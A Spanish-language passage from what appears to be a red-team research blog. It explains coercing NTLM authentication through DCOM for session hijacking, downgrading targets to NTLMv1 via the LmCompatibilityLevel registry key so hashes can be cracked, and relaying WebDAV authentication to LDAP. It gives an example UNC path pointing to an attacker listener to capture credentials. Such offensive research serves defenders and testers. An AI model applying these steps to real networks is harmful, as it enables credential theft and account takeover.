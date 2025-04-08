Ahora que sabemos que es posible convertir un objeto DCOM en una herramienta de secuestro de sesión, el siguiente paso es identificar qué métodos y propiedades se pueden aprovechar para completar el secuestro. Para esta investigación, exploré si se podía lograr el compromiso de los usuarios sin ejecutar una carga útil, adoptando un enfoque diferente al de la mayoría de las técnicas públicas de movimiento lateral de DCOM.

Me concentré en lograr resultados comparables en un formato “sin archivos”, lo que significa que no es necesario transferir o ejecutar una carga útil en el sistema de destino. Esta distinción es importante porque transferir y ejecutar cargas útiles en un sistema de destino a menudo se considera una acción "costosa" en las operaciones del equipo rojo. Al evitar este paso, el riesgo de activar controles de seguridad comunes se reduce significativamente. Por lo tanto, mi objetivo era comprometer cuentas de usuario remotas forzando una autenticación NTLM mediante DCOM.

Hay varios beneficios clave para coaccionar las autenticaciones NTLM en lugar de realizar técnicas tradicionales de movimiento lateral:

Capturar hashes NTLMv1/NTLMv2 e intentar descifrarlos sin conexión

Retransmitir hashes NTLMv1 o WebDAV NTLMv2 a otros servicios de red, como LDAP o SMB, para realizar acciones como el usuario afectado

Evitar transferir y ejecutar una carga útil en el sistema objetivo, que normalmente es objeto de un mayor escrutinio por parte de las herramientas de seguridad

Evitar tocar el proceso LSASS, reduciendo así los riesgos de detección

En el momento de redactar este blog, la firma LDAP y el enlace de canal no son obligatorios ni se aplican de forma predeterminada en la mayoría de los controladores de dominio. Estas características de seguridad solo son obligatorias en Windows Server 2025. Esto significa que si podemos forzar una autenticación NTLMv1 o WebDAV desde el sistema de destino, podemos retransmitirla a LDAP y realizar acciones como el usuario afectado. Del mismo modo, la firma SMB no es necesaria por defecto en los servidores Windows, excepto en los controladores de dominio.

Otra consideración importante es que los hashes de NTLMv1 se pueden descifrar de forma trivial con tablas arcoíris, que Nic Losby ha compartido públicamente en diciembre de 2024. Estas tablas reducen drásticamente el tiempo y el esfuerzo necesarios para recuperar las credenciales NTLM de los hashes NTLMv1. Para obtener un hash NTLMv1 en lugar de un hash NTLMv2, modificamos la siguiente clave de registro en el sistema de destino:

HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel

Establecer LmCompatibilityLevel a un valor de 2 o menos obliga al sistema a recurrir a NTLMv1 para la autenticación. Esta modificación es posible con privilegios de administrador local y se conoce comúnmente como "ataque de degradación de NetNTLMv1".

Como alternativa, podemos capturar una autenticación WebDAV y retransmitirla a LDAP, ya que las autenticaciones basadas en HTTP se pueden reenviar a este servicio. Si el servicio WebClient aún no se está ejecutando con acceso privilegiado, podemos habilitarlo de forma remota en el sistema de destino. Una vez habilitado, podemos forzar una autenticación NTLM de WebDAV a nuestro oyente especificando el nombre NetBIOS de la máquina en la ruta UNC. Por ejemplo:

\\MYHACKERBOX@80\giveme\creds.txt

Para obtener más información sobre los ataques de retransmisión NTLM y los protocolos que pueden retransmitirse a diferentes endpoints, consulte el siguiente recurso aquí.